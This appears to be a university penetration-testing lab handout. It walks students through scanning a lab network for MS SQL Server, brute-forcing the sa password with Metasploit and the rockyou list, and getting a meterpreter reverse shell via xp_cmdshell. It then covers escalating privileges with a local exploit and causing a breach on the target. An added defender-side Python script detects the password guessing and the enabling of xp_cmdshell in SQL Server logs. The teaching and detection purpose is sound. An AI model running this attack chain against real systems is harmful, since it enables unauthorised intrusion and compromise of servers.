1. Scan the network to check for MS SQL service

In this part, scan all computers in the network for the MS SQL Server service (port 1433). Use the service detection option you used last week. Run Nmap with the options described above and take a screenshot(s) of the result showing that the port is open on Windows 2008.

Type the command here

2. Crack the sa password

sa is the most privileged account in an SQL Server. This account is usually targeted by hackers, as you will do in this part. You will use Metasploit to crack the password of the sa account.

| Command | Notes |
|---|---|
| gunzip /usr/share/wordlists/rockyou.txt.gz | Decompress the password dictionary. |
| msfconsole | Open Metasploit. |
| search mssql_login | Find a relevant Metasploit module. |
| Type the command here | Type in the required command. |
| show options | See a list of available options. Confirm that the username option has already been set to "sa". You still need to set some options. |
| Type the command here | Set the remote host (SQL Server) to connect to; the Metasploit module will then try passwords remotely by brute force. |
| Type the command here | Check the username; if you see root, change it to the correct one. |
| set pass_file /usr/share/wordlists/rockyou.txt | This is the password list (dictionary) you decompressed. You will use it to crack the password. |
| set verbose false | Type in this command if you don't want to see a message for every failed login attempt. |
| run | Take a screenshot of the terminal window showing the password of the sa account. Note: take a note of this password; you will use it later on. This command takes about 80 seconds to complete. |

3. Get a shell

In this part, you will try to get a shell from Windows 2008 using the xp_cmdshell procedure on MS SQL Server. xp_cmdshell is a dangerous extended procedure that enables interaction between the MS SQL Server and the operating system. You can run Windows commands from SQL Server and perform operations such as copying files, creating folders, and many others. In this part, you will use a Metasploit payload that exploits xp_cmdshell to create a shell.

| Command | Notes |
|---|---|
| search mssql_payload | Search Metasploit for possible MS SQL payloads. |
| use exploit/windows/mssql/mssql_payload | This is the Metasploit module that uses the xp_cmdshell procedure on MS SQL Server. |
| show options | See the possible options for this module. By default, the username option has already been set to "sa". |
| Type the command here | Did you see that the RHOSTS parameter is blank? Set it to the Windows 2008 server. RPORT has already been set to 1433. |
| Type the command here | Set the password of the sa account you cracked in the previous part. |
| set payload windows/x64/meterpreter/reverse_tcp | You have to set the payload option, although it is not shown in the options list. This is a global option that applies to the mssql_payload exploit. Note that mssql_payload uses the xp_cmdshell procedure, but it still needs a mechanism to handle the MS SQL Server traffic; this is similar to the analog RC car and its remote control from Project 1. |
| Type the command here | Set the local counterpart of the host option. |
| set lport 443 | Set the local counterpart of the port number. |
| run or exploit | You should get a shell after running the exploit. |

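As an added defender-side example (not part of this lab handout and not Metasploit's code), the following Python script shows what parts 2 and 3 look like from the SQL Server side: it parses ERRORLOG-style lines, flags a burst of failed "sa" logins from one client and notes whether the same client then logged in successfully (the mssql_login dictionary attack), and flags the moment the xp_cmdshell option is switched on (what mssql_payload depends on). The log lines are constructed for this example and modelled on the SQL Server ERRORLOG message format; the threshold of five failures in sixty seconds is an assumed tuning value.

```python
"""Detect sa password guessing and xp_cmdshell enablement in SQL Server ERRORLOG text.

Added example for the lab above; the log lines below are constructed, not captured."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines (modelled on the real message format, not real data).
SAMPLE_LOG = """\
2024-05-01 10:15:01.23 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:15:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:15:01.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:15:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:15:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:15:01.63 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:15:01.75 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:16:20.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.5]
2024-05-01 10:20:33.10 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 11:02:10.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

# "<timestamp> <source> <message>" as written by SQL Server's error log.
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) (?P<src>\S+)\s+(?P<msg>.*)$")
LOGIN_RE = re.compile(r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from (?P<old>\d) to (?P<new>\d)")


def parse_errorlog(text):
    """Turn ERRORLOG text into a list of event dicts; lines of no interest are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        msg = m.group("msg")
        login = LOGIN_RE.search(msg)
        if login:
            events.append({"ts": ts, "kind": "login_" + login.group("result"),
                           "user": login.group("user"), "client": login.group("client")})
            continue
        xp = XPCMD_RE.search(msg)
        if xp and xp.group("new") == "1":
            events.append({"ts": ts, "kind": "xp_cmdshell_enabled", "user": None, "client": None})
    return events


def find_password_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Flag (user, client) pairs with >= threshold failed logins inside any sliding window,
    and record whether that pair later logged in successfully (the guess found the password)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        key = (e["user"], e["client"])
        if e["kind"] == "login_failed":
            failures[key].append(e["ts"])
        elif e["kind"] == "login_succeeded":
            successes[key].append(e["ts"])
    alerts = []
    for key, stamps in failures.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):          # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            later_success = any(s > stamps[-1] for s in successes.get(key, []))
            alerts.append({"user": key[0], "client": key[1], "failures_in_window": best,
                           "first": stamps[0], "last": stamps[-1],
                           "followed_by_success": later_success})
    return alerts


def find_xp_cmdshell_enabled(events):
    """Timestamps at which the xp_cmdshell option was turned on."""
    return [e["ts"] for e in events if e["kind"] == "xp_cmdshell_enabled"]


def analyze(text):
    events = parse_errorlog(text)
    return {"password_guessing": find_password_guessing(events),
            "xp_cmdshell_enabled": find_xp_cmdshell_enabled(events)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for a in report["password_guessing"]:
        print(f"password guessing: user={a['user']} client={a['client']} "
              f"failures={a['failures_in_window']} followed_by_success={a['followed_by_success']}")
    for ts in report["xp_cmdshell_enabled"]:
        print(f"xp_cmdshell enabled at {ts}")
```

On the constructed input the script reports one guessing burst (six failures for sa from 10.0.0.5, followed by a success) and one xp_cmdshell enablement; the single appuser failure stays below the threshold. Setting verbose to false in mssql_login only silences the attacker's console; every attempt still lands in the server's error log, which is why this signal is worth collecting.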
4. Confirm that the shell is low-privileged

Now try some commands to check your privilege level on the shell.

| Commands | Notes |
|---|---|
| shell | Switch to the Windows 2008 native shell. |
| whoami | See the currently logged-on user name. It is probably a low-privileged shell. Let's try doing something that requires privileges. |
| Type the command here | Try to add a user account from the command line. Take a screenshot of the terminal window showing the result. |
| exit | Exit from the Windows 2008 shell and return to the meterpreter shell. |

5. Get a high-privileged shell

In this part, you will use the exploit suggester module to find some exploits for privilege escalation, and then use one of these exploits.

| Command | Notes |
|---|---|
| background | Don't forget to note the ID of the session. |
| search suggester | Search for the keyword "suggester" to find the correct name of the suggester module. |
| Type the command here | Type in the correct command. |
| show options | |
| Type the command here | Write the correct command. |
| run or exploit | Run the exploit suggester so that it suggests exploits to run on the low-privileged shell to get a high-privileged shell. |
| Type the command here | Use ms16_014_wmi_recv_notif. Type in the correct command. |
| show options | |
| set session # | Use the same session ID here as the one you chose for the exploit suggester. Remember, you are trying the exploits suggested by local_exploit_suggester. |
| run or exploit | After running the exploit, you should see the message "Exploit completed, but no session was created." |
| show options | This time you will see the options of the payload (reverse_shell_tcp). |
| Type the command here | Set the first option of the payload. |
| Type the command here | Set the second option of the payload. |
| run or exploit | You should get a shell after running the exploit. You will see a Windows shell instead of a meterpreter shell. (Press Enter once.) |

6. Confirm that the shell is high-privileged

Now check whether you have the privilege to perform dangerous actions.

| Command | Notes |
|---|---|
| whoami | Take a screenshot of the terminal window showing the username. |

7. Give rise to an information security breach

| Command | Notes |
|---|---|
| Type the command(s) here | Do something that will cause loss of confidentiality, integrity, or availability on the target system. Provide the details and take screenshots. Please perform something other than what you did in Project 2. (Don't create a user account.) |